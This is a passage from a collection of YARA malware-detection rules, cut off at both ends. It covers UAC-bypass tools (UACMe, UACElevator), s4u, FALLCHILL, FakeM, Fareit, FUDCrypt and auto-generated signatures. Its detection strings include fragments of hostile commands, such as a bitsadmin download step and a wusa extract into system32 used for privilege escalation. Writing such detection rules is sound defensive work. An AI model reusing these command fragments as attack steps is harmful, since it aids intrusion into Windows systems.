        $x6 = "For injection, pick any unelevated Windows process with ASLR on:" fullword wide
        $s1 = "\\cmd.exe" wide
        $s2 = "runas" wide
        $s3 = "explorer.exe" wide
        $s4 = "Couldn't load kernel32.dll" wide
        $s5 = "CRYPTBASE.dll" wide
        $s6 = "shell32.dll" wide
        // NOTE(review): $s7 and $s9 carry the same pattern; "all of ($s*)" is unaffected
        $s7 = "ShellExecuteEx" ascii
        $s8 = "COMCTL32.dll" ascii
        $s9 = "ShellExecuteEx" ascii
        $s10 = "HeapAlloc" ascii
    condition:
        uint16(0) == 0x5a4d and ( 1 of ($x*) or all of ($s*) )
}

// No MZ gate on this one: a single $x* string anywhere in a file fires it.
rule UACME_Akagi {
    meta:
        description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
        author = "Florian Roth"
        reference = "https://github.com/hfiref0x/UACME"
        date = "2015-05-14"
        hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
        hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
        score = 60
    strings:
        $x1 = "UACMe injected, Fubuki at your service." wide fullword
        $x3 = "%temp%\\Hibiki.dll" fullword wide
        $x4 = "[UCM] Cannot write to the target process memory." fullword wide
        $s1 = "%systemroot%\\system32\\cmd.exe" wide
        $s2 = "D:(A;;GA;;;WD)" wide
        $s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" fullword wide
        $s4 = "/c wusa %ws /extract:%%windir%%\\system32" fullword wide
        $s5 = "Fubuki.dll" ascii fullword
        $l1 = "ntdll.dll" ascii
        $l2 = "Cabinet.dll" ascii
        $l3 = "GetProcessHeap" ascii
        $l4 = "WriteProcessMemory" ascii
        $l5 = "ShellExecuteEx" ascii
    condition:
        ( 1 of ($x*) ) or ( 3 of ($s*) and all of ($l*) )
}

rule UACElevator {
    meta:
        description = "UACElevator bypassing UAC - file UACElevator.exe"
        author = "Florian Roth"
        reference = "https://github.com/MalwareTech/UACElevator"
        date = "2015-05-14"
        hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
    strings:
        $x1 = "\\UACElevator.pdb" ascii
        $s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
        $s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
        $s3 = "Infection module: %s" fullword ascii
        $s4 = "Could not save module to %s" fullword ascii
        $s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
        // $s6-$s8 are debug-CRT runtime strings; hence 8 of 9 are required
        $s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
        $s7 = "Stack around the variable '" fullword ascii
        $s8 = "MSVCR120D.dll" fullword wide
        $s9 = "Address: 0x" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ($s*) )
}

rule s4u {
    meta:
        description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
        author = "Florian Roth"
        reference = "https://github.com/aurel26/s-4-u-for-windows"
        date = "2015-06-05"
        hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
        score = 50
    strings:
        // Specific strings (may change)
        $x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii
        $x1 = "\\Release\\s4u.pdb" ascii
        // Less specific strings
        $s0 = "CreateProcessAsUser failed (error %u)." fullword ascii
        $s1 = "GetTokenInformation failed (error: %u)." fullword ascii
        $s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii
        $s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii
        $s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii
        $s5 = "The token does not have the specified privilege (%S)." fullword ascii
        $s6 = "Unable to parse command line." fullword ascii
        $s7 = "Unable to find logon SID." fullword ascii
        $s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii
        $s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii
        // Generic
        // NOTE(review): "all of ($g*)" alone can be satisfied by other small binaries that
        // import this API set; the 60KB bound is the only extra constraint on that branch
        $g1 = "%systemroot%\\system32\\cmd.exe" wide
        $g2 = "SeTcbPrivilege" wide
        $g3 = "winsta0\\default" wide
        $g4 = ".rsrc"
        $g5 = "HeapAlloc"
        $g6 = "GetCurrentProcess"
        $g7 = "HeapFree"
        $g8 = "GetProcessHeap"
        $g9 = "ExpandEnvironmentStrings"
        $g10 = "ConvertStringSidToSid"
        $g11 = "LookupPrivilegeValue"
        $g12 = "AllocateLocallyUniqueId"
        $g13 = "ADVAPI32.dll"
        $g14 = "LsaLookupAuthenticationPackage"
        $g15 = "Secur32.dll"
        $g16 = "MSVCR120.dll"
    condition:
        uint16(0) == 0x5a4d and filesize < 60KB and ( 1 of ($x*) or all of ($s*) or all of ($g*) )
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Ezcob family (Seth Hardy): \x12-interleaved identifier strings plus a timestamp.
rule EzcobStrings : Ezcob Family {
    meta:
        description = "Ezcob Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-23"
    strings:
        $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
        $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
        $ = "Ezcob" wide ascii
        $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
        $ = "20110113144935"
    condition:
        any of them
}

rule Ezcob : Family {
    meta:
        description = "Ezcob"
        author = "Seth Hardy"
        last_modified = "2014-06-23"
    condition:
        EzcobStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// f0xy downloader: "MZ" at offset 0 plus all three of its command-line fragments.
rule ws_f0xy_downloader {
    meta:
        description = "f0xy malware downloader"
        author = "Nick Griffin (Websense)"
    strings:
        $mz = "MZ"
        $string1 = "bitsadmin /transfer"
        $string2 = "del rm.bat"
        $string3 = "av_list="
    condition:
        ($mz at 0) and (all of ($string*))
}

// FALLCHILL (US-CERT TA17-318A). Both rules check a real PE: "MZ" at 0 and
// "PE" at the e_lfanew offset read from 0x3c.
rule rc4_stack_key_fallchill {
    meta:
        description = "rc4_stack_key"
        ref = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
    strings:
        // key material pushed onto the stack, with wildcarded 4-byte gaps
        $stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $stack_key
}

rule success_fail_codes_fallchill {
    meta:
        description = "success_fail_codes"
        ref = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
    strings:
        // push/mov of the success (0x12347a) and failure (0x12345c) immediates;
        // a sample must carry a matching pair of the same encoding
        $s0 = { 68 7a 34 12 00 }
        $s1 = { ba 7a 34 12 00 }
        $f0 = { 68 5c 34 12 00 }
        $f1 = { ba 5c 34 12 00 }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and (($s0 and $f0) or ($s1 and $f1))
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

// FUDCrypt: fixed identifier strings from the public source; any one matches,
// with no file-type gate.
rule FUDCrypter {
    meta:
        description = "Detects unmodified FUDCrypt samples"
        reference = "https://github.com/gigajew/FudCrypt/"
        author = "https://github.com/hwvs"
        last_modified = "2019-11-21"
    strings:
        $ = "OcYjzPUtJkNbLOABqYvNbvhZf" wide ascii
        $ = "gwiXxyIDDtoYzgMSRGMckRbJi" wide ascii
        $ = "BclWgISTcaGjnwrzSCIuKruKm" wide ascii
        $ = "CJyUSiUNrIVbgksjxpAMUkAJJ" wide ascii
        $ = "fAMVdoPUEyHEWdxQIEJPRYbEN" wide ascii
        $ = "CIGQUctdcUPqUjoucmcoffECY" wide ascii
        $ = "wcZfHOgetgAExzSoWFJFQdAyO" wide ascii
        $ = "DqYKDnIoLeZDWYlQWoxZnpfPR" wide ascii
        $ = "MkhMoOHCbGUMqtnRDJKnBYnOj" wide ascii
        $ = "sHEqLMGglkBAOIUfcSAgMvZfs" wide ascii
        $ = "JtZApJhbFAIFxzHLjjyEQvtgd" wide ascii
        $ = "IIQrSWZEMmoQIKGuxxwoTwXka" wide ascii
    condition:
        1 of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// FAKEM HTML variant: the decryption loop plus exactly 16 one-byte stack stores.
rule HTMLVariant : FakeM Family HTML Variant {
    meta:
        description = "Identifier for html variant of FAKEM"
        author = "Katie Kleemola"
        last_updated = "2014-05-20"
    strings:
        // decryption loop
        $s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
        // mov byte ptr [ebp - x], y   with x in 0x10..0x1 and y in '0'-'9','A'-'F'
        $s2 = { C6 45 F? (3?|4?) }
    condition:
        $s1 and #s2 == 16
}

rule FakeM_Generic {
    meta:
        description = "Detects FakeM malware samples"
        author = "Florian Roth"
        reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
        date = "2016-01-25"
        score = 85
        hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
        hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
        hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
        hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
        hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
        hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
        hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
        hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
        hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
        hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
        hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
    strings:
        // string groups $a..$e each describe one sample cluster; $f fires on its own
        $a1 = "\\system32\\kernel32.dll" fullword ascii
        $a2 = "\\boot.lnk" fullword ascii
        $a3 = "%USERPROFILE%" fullword ascii /* Goodware String - occurred 16 times */
        $b1 = "Wizard.EXE" fullword wide
        $b2 = "CommandLineA" fullword ascii
        // $c1 repeats $a1's pattern under a second identifier so group $c stands alone
        $c1 = "\\system32\\kernel32.dll" fullword ascii
        $c2 = "\\aapz.tmp" fullword ascii
        $e1 = "C:\\Documents and Settings\\A\\" fullword ascii
        $e2 = "\\svchost.exe" fullword ascii
        $e3 = "\\Perform\\Release\\Perform.pdb" fullword ascii
        $f1 = "Browser.EXE" fullword wide
        $f2 = "\\browser.exe" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($a*) or all of ($b*) or all of ($c*) or all of ($e*) or 1 of ($f*) )
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2015-10-18
    Identifier: Fareit Oct 2015
*/

// Fareit wave of Sep/Oct 2015: two wide strings, both within the first 30000
// bytes of a PE.
rule Fareit_Trojan_Oct15 {
    meta:
        description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
        author = "Florian Roth"
        reference = "http://goo.gl/5VYtlU"
        date = "2015-10-18"
        score = 80
        super_rule = 1
        hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
        hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
        hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
        hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
        hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
        hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
        hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
    strings:
        $s1 = "ebai.exe" fullword wide
        $s2 = "Origina" fullword wide
    condition:
        uint16(0) == 0x5a4d and $s1 in (0..30000) and $s2 in (0..30000)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Favorite family (Seth Hardy).
rule FavoriteCode : Favorite Family {
    meta:
        description = "Favorite code features"
        author = "Seth Hardy"
        last_modified = "2014-06-24"
    strings:
        // standard string hiding: byte-at-a-time stores to the stack frame
        $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
        $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
    condition:
        any of them
}

rule FavoriteStrings : Favorite Family {
    meta:
        description = "Favorite Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-24"
    strings:
        $string1 = "!QAZ4rfv"
        $file1 = "msupdater.exe"
        $file2 = "FAVORITES.DAT"
    condition:
        any of ($string*) or all of ($file*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

/*
    Yara Rule Set
    Author: YarGen Rule Generator
    Date: 2016-07-21
    Identifier: NBXC4L
    ref = http://pastebin.com/raw/FdrnPwae
*/

/* Rule Set ----------------------------------------------------------------- */
/* Auto-generated. The $s* strings look like compiler-emitted address/line
   tables rather than author-chosen text (presumably low specificity on their
   own), so each rule also needs one $op* opcode sequence on the gated branch. */

rule d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9 {
    meta:
        description = "Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "d1dc9b2905264da34dc97d6c005810fbcc99be1a6b4b41f883bb179dbcacba6e"
    strings:
        $s1 = ":&:-:=:J:O:\\:m:r:" fullword ascii
        $s2 = "6)6/666;6N6W6^6c6t6y6" fullword ascii
        $s3 = "666Q6V6b6g6~6" fullword ascii
        $s4 = "0%0,010A0F0K0\\0a0f0w0|0" fullword ascii
        $s5 = "6!6(63686E6J6W6\\6i6n6{6" fullword ascii
        $s6 = "3 3%33383=3J3R3`3e3o3t3~3" fullword ascii
        $s7 = "4 4'40454:4G4M4R4_4e4j4w4" fullword ascii
        $s8 = "1#1(141=1B1N1T1Y1e1k1p1|1" fullword ascii
        $s9 = "?(?2?<?C?J?Q?X?_?f?m?t?{?" fullword ascii
        $s10 = "?#?*?1?8???F?M?T?[?b?i?p?w?" fullword ascii
        $s11 = "6)6/646@6F6K6W6]6b6n6w6|6" fullword ascii
        $s12 = "4#40454:4G4L4Q4^4c4h4u4z4" fullword ascii
        $s13 = "<\"<'<3<8<=<I<N<S<_<d<i<u<z<" fullword ascii
        $s14 = ">%>/>9>@>G>N>U>\\>c>j>q>" fullword ascii
        $s15 = "WTZDAE" fullword ascii
        $s16 = "060>0E0K0P0\\0b0g0v0|0" fullword ascii
        $s17 = "4#4-474A4K4U4\\4f4p4z4" fullword ascii
        $s18 = "7\"7,767@7J7T7^7h7q7{7" fullword ascii
        $s19 = ";\";';4;E;J;W;k;p;};" fullword ascii
        $s20 = ";0;;;F;Q;\\;g;r;};" fullword ascii
        $op0 = { a1 b8 63 44 00 83 c4 14 53 ff 75 14 56 57 ff 90 } /* Opcode */
        $op1 = { 8b d8 8b 45 08 8b 40 3a 81 c3 00 10 00 00 03 c3 } /* Opcode */
        $op2 = { 5c 2d 44 00 c7 84 24 c0 } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) ) and 1 of ($op*) ) or ( all of them )
}

rule sig_7acb8d6d4c062c3097a7d31df103bc4d018519f9 {
    meta:
        description = "Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "e1607486cbb2d111d5df314fe58948aa0dc5897f56f7fd763c62bb30651380e3"
    strings:
        $s1 = "5(666Z6c6" fullword ascii
        $s2 = "Wlm;y%UD%d" fullword ascii
        $s3 = ";1;9;@;G;N;U;\\;c;j;q;x;" fullword ascii
        $s4 = "8 8'8.858<8C8J8Q8X8_8f8m8t8" fullword ascii
        $s5 = "2 2,282=2B2G2P2U2Z2_2h2s2x2" fullword ascii
        $s6 = "4'5.555<5C5J5Q5X5_5f5m5t5{5" fullword ascii
        $s7 = "0#0*01080?0F0M0T0[0b0i0p0w0" fullword ascii
        $s8 = "6$6,616=6B6G6S6X6]6i6n6s6" fullword ascii
        $s9 = "=\"=)=0=7=>=E=L=S=Z=a=h=" fullword ascii
        $s10 = "6&6-646;6B6I6P6W6^6e6l6s6z6" fullword ascii
        $s11 = "O.QrH@" fullword ascii
        $s12 = ">\">/>4>A>F>S>X>e>j>w>|>" fullword ascii
        $s13 = "0#0(040=0B0N0T0Y0e0k0p0|0" fullword ascii
        $s14 = "5)5/545@5F5K5W5`5e5q5w5|5" fullword ascii
        $s15 = "=!=&=3=8=E=N=S=`=e=s=x=}=" fullword ascii
        $s16 = ":(:/:6:=:D:K:R:Y:`:g:n:u:|:" fullword ascii
        $s17 = "7\"727<7F7M7W7a7k7u7" fullword ascii
        $s18 = "2+21262E2K2P2\\2h2m2|2" fullword ascii
        $s19 = ";/;5;:;G;V;\\;a;n;};" fullword ascii
        $s20 = ";\";-;8;C;N;^;i;t;" fullword ascii
        $op0 = { ff 44 24 14 8d 47 44 50 a1 08 63 44 00 ff 90 84 } /* Opcode */
        $op1 = { 6d 43 00 c7 84 24 10 03 00 00 0c 6d 43 00 c7 84 } /* Opcode */
        $op2 = { c7 43 0c 20 02 00 00 89 5d f0 ff 90 f8 } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) ) and 1 of ($op*) ) or ( all of them )
}

rule sig_5783b35b2eace55a5762df27fcb0b0fb28371b3e {
    meta:
        description = "Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "72513534f2e0f3e77a22023b887df3718c9df70686eb0ae58cbbde2f90f447e4"
    strings:
        $s1 = "B+P:\\6" fullword ascii
        $s2 = "6.666K6S6d6l6}6" fullword ascii
        $s3 = "0!0&0+0<0A0F0W0\\0a0n0z0" fullword ascii
        $s4 = ";#;);.;:;@;E;Q;W;\\;h;q;v;" fullword ascii
        $s5 = "2#2-222F2L2W2\\2b2g2x2~2" fullword ascii
        $s6 = "9\"9)90979>9E9L9S9Z9k9}9" fullword ascii
        $s7 = "6-747;7B7I7P7W7^7e7l7s7z7" fullword ascii
        $s8 = "4\"4'43494>4J4P4U4a4g4l4x4" fullword ascii
        $s9 = ":#:(:4:::?:K:T:Y:e:k:p:|:" fullword ascii
        $s10 = "WD.hyA" fullword ascii
        $s11 = "<\"<)<0<7<><E<L<S<Z<a<h<" fullword ascii
        $s12 = "=&=,=1=>=D=I=V=_=d=q=w=|=" fullword ascii
        $s13 = "; ;(;0;8;@;H;P;X;`;h;p;{;" fullword ascii
        $s14 = "<\"<)<0<7<><E<L<S<Z<a<h<o<v<" fullword ascii
        $s15 = "6#6(616;6@6I6S6X6d6n6s6|6" fullword ascii
        $s16 = "(%r-c;u" fullword ascii
        $s17 = "3%3G3N3U3\\3c3j3q3x3" fullword ascii
        $s18 = "7\"767T7[7b7i7p7w7~7" fullword ascii
        $s19 = "1 1-1>1C1P1a1f1s1" fullword ascii
        $s20 = "8 8&8,8A8M8^8d8i8" fullword ascii
        $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */
        $op1 = { a1 e0 79 44 00 57 ff 75 1c ff 90 78 01 00 00 83 } /* Opcode */
        $op2 = { 3c ee 42 00 c7 84 24 8c } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) ) and 1 of ($op*) ) or ( all of them )
}

// next rule continues past the end of this chunk
rule sig_2fb404bdcebc7acbeb598f8a2ddbecf48c60b113 {
    meta:
        description = "Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex"
        author =
"YarGen Rule Generator" reference = "not set" date = "2016-07-21" hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948" strings: $s1 = ":%:0:;:F:Q:\\:p:|:" fullword ascii $s2 = "6.666>6F6N6V6^6f6n6v6~6" fullword ascii $s3 = "6!6(6/666=6D6K6R6Y6r6:7" fullword ascii $s4 = "1t83jL.bjG" fullword ascii $s5 = "6!61666V6]6p6" fullword ascii $s6 = "2%2D2P2`2p2|2" fullword ascii $s7 = "42494@4G4N4U4\\4c4j4q4x4" fullword ascii $s8 = "9+92999@9G9N9U9\\9c9j9q9x9" fullword ascii $s9 = "4!4&43484E4J4W4\\4i4n4s4" fullword ascii $s10 = "5$5+52595@5G5N5U5\\5c5j5q5" fullword ascii $s11 = "1.252<2C2J2Q2X2_2f2m2t2{2" fullword ascii $s12 = "8 8%818:8?8K8Q8V8b8h8m8y8" fullword ascii $s13 = "9'93989=9B9K9P9U9Z9c9n9s9" fullword ascii $s14 = ":\":':,:8:=:B:R:Z:`:e:v:}:" fullword ascii $s15 = "=#=(=4=:=?=K=Q=V=b=k=p=|=" fullword ascii $s16 = "= =*=1=8=?=F=M=T=[=b=i=p=w=~=" fullword ascii $s17 = "3&3-343;3B3I3P3W3^3e3l3s3z3" fullword ascii $s18 = ":!:(:/:6:=:I:N:S:`:f:k:x:~:" fullword ascii $s19 = "cMDkAjy=" fullword ascii $s20 = "=#=/=4=9=E=J=O=[=`=e=q=v={=" fullword ascii $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */ $op1 = { 3c ee 42 00 c7 84 24 8c } /* Opcode */ $op2 = { a1 e0 79 44 00 83 c4 0c ff 74 24 1c ff 90 3c 01 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 10 of ($s*) )and 1 of ($op*) ) or ( all of them ) } /* Super Rules ------------------------------------------------------------- */ rule _84b76d765e7357fa5402b5af97d351424a8edf03_d0f90c1b3ebd79a816b5597a49ae8257df697591_da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb_0 { meta: description = "Auto-generated rule - from files 84b76d765e7357fa5402b5af97d351424a8edf03.codex, d0f90c1b3ebd79a816b5597a49ae8257df697591.codex, da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" super_rule = 1 hash1 = "add7ed26bc5bcacdf3159fcde71bdd429feeef94dff7d3b22bc9af9deb471c48" hash2 = 
"a9a62edbafa5932894ed53319c924932b94a0ccdf15644764256eed39fd46d86" hash3 = "efcc9e0377cf83a73bd5fbe42a51a2330936b8e362fc2ab99af6d932079893d9" strings: $s1 = ":\":':,:5:=:B:K:P:U:^:c:h:q:v:{:" fullword ascii $s2 = "Y@.hdd \\" fullword ascii $s3 = "0$0+02090@0G0N0U0\\0c0j0v0{0" fullword ascii $s4 = "6\"6(6-6:6I6O6T6a6p6v6{6" fullword ascii $s5 = "1\"1/14191F1K1P1]1b1g1t1y1~1" fullword ascii $s6 = "0\"0(0-0<0B0G0S0_0d0s0y0~0" fullword ascii $s7 = "9\"9'959:9?9L9Q9^9c9p9y9~9" fullword ascii $s8 = "3%3*363=3B3N3T3Y3e3k3p3|3" fullword ascii $s9 = "4#4)4.4:4C4H4T4Z4_4k4q4v4" fullword ascii $s10 = "|&.WTm" fullword ascii $s11 = "6#63686E6J6W6\\6i6n6{6" fullword ascii $s12 = ";\";(;7;F;W;];f;o;{;" fullword ascii $s13 = "0+02080>0B0P0\\0i0|0" fullword ascii $s14 = "1 1(10181C1N1Y1d1o1z1" fullword ascii $s15 = "3 3%3*3;3@3E3R3^3c3t3y3" fullword ascii $s16 = "8\"8)8.8:8?8S8X8f8r8x8" fullword ascii $s17 = "8$8+82898@8G8N8U8\\8" fullword ascii $s18 = "9-929?9P9U9b9s9x9" fullword ascii $s19 = "9*9/9<9A9N9T9`9e9r9w9" fullword ascii $s20 = "2-292?2G2N2U2\\2c2j2q2" fullword ascii $op0 = { e0b34200c78424ac } /* Opcode */ $op1 = { 39750c598bd0598955fc7e4b0fb64c3e } /* Opcode */ $op2 = { 3cee4200c784248c } /* Opcode */ $op3 = { a1a8794400681c40430057ff90400100 } /* Opcode */ $op4 = { 395814eb31a1a879440057ff75f456ff } /* Opcode */ $op5 = { 663bd875438bc62b450c8945fceb038b } /* Opcode */ $op6 = { f24200c784245c01000010f24200c784 } /* Opcode */ $op7 = { 83c4108944241c8d4424345056ff7424 } /* Opcode */ $op8 = { 83c41483f8ff74138b4de88d04868b04 } /* Opcode */ $op9 = { 7cb34200c784249c } /* Opcode */ $op10 = { f8ae4300c78424e0 } /* Opcode */ $op11 = { 08b44200c78424b8 } /* Opcode */ $op12 = { 57568944241c50a1a8794400ff907801 } /* Opcode */ $op13 = { e0174300c78424d8 } /* Opcode */ $op14 = { 8b4dfc8b0481050410000050a1a87944 } /* Opcode */ $op15 = { 595985c00f8586010000685c5a4300ff } /* Opcode */ $op16 = { 595933c05e5f5bc9c3ff75c88b7508ff } /* Opcode */ $op17 = { 28424400c78424c4 } /* Opcode 
*/ $op18 = { 83c4188945fc837dfc000f848f } /* Opcode */ $op19 = { 895dbc895dfcff90f8 } /* Opcode */ $op20 = { 595985c00f8543050000689c534300ff } /* Opcode */ $op21 = { ff90bc0200003d220000c075408d4424 } /* Opcode */ $op22 = { 383c4400c78424e0 } /* Opcode */ $op23 = { 85c07495eb03885dffa1a879440057ff } /* Opcode */ $op24 = { 6a01ff75acff75f46a00ff750ca1a879 } /* Opcode */ $op25 = { 40af4300c784240001000048af4300c7 } /* Opcode */ $op26 = { 836508005959668b4b02664966894802 } /* Opcode */ $op27 = { ff75108bd8ff750ca1a879440068385e } /* Opcode */ $op28 = { c4b34200c78424a8 } /* Opcode */ $op29 = { dc404400c7842498 } /* Opcode */ $op30 = { 30af4300c78424fc } /* Opcode */ $op31 = { bfb025440057894df0ff90c402000059 } /* Opcode */ $op32 = { 806a4300c78424f0 } /* Opcode */ $op33 = { 80ee4200c784249c } /* Opcode */ $op34 = { 1f4300c7842468020000141f4300c784 } /* Opcode */ $op35 = { 68feff0000ff750889442428a1a87944 } /* Opcode */ $op36 = { 897424688974246cff904803000085c0 } /* Opcode */ $op37 = { 85c00f8495fdffffff742414a1a87944 } /* Opcode */ $op38 = { 10184300c78424e8 } /* Opcode */ $op39 = { ff75fca1a8794400576868c64300688c } /* Opcode */ $op40 = { 59598945888b458cff308b458c83c004 } /* Opcode */ $op41 = { 595985c00f85130700006860524300ff } /* Opcode */ $op42 = { 603c4400c78424ec } /* Opcode */ $op43 = { 8b450cff742414668378023f50a1a879 } /* Opcode */ $op44 = { 595985c00f85fa010000680c5a4300ff } /* Opcode */ $op45 = { fcf84200c78424c0 } /* Opcode */ $op46 = { 14f94200c78424c8 } /* Opcode */ $op47 = { 3c6a4300c78424e8 } /* Opcode */ $op48 = { 88424400c78424d4 } /* Opcode */ $op49 = { 83c4188945fc837dfc000f8404010000 } /* Opcode */ $op50 = { 595985c00f8568020000ff75dca1a879 } /* Opcode */ $op51 = { 8b463a0345fc50a1a8794400ff900404 } /* Opcode */ $op52 = { 85c00f84cdfdffffff742414a1a87944 } /* Opcode */ $op53 = { a1a879440056ff90a0 } /* Opcode */ $op54 = { 40ae4300c78424b0 } /* Opcode */ $op55 = { 83c40cff7588ff7508a1a8794400ff90 } /* Opcode */ $op56 = { 
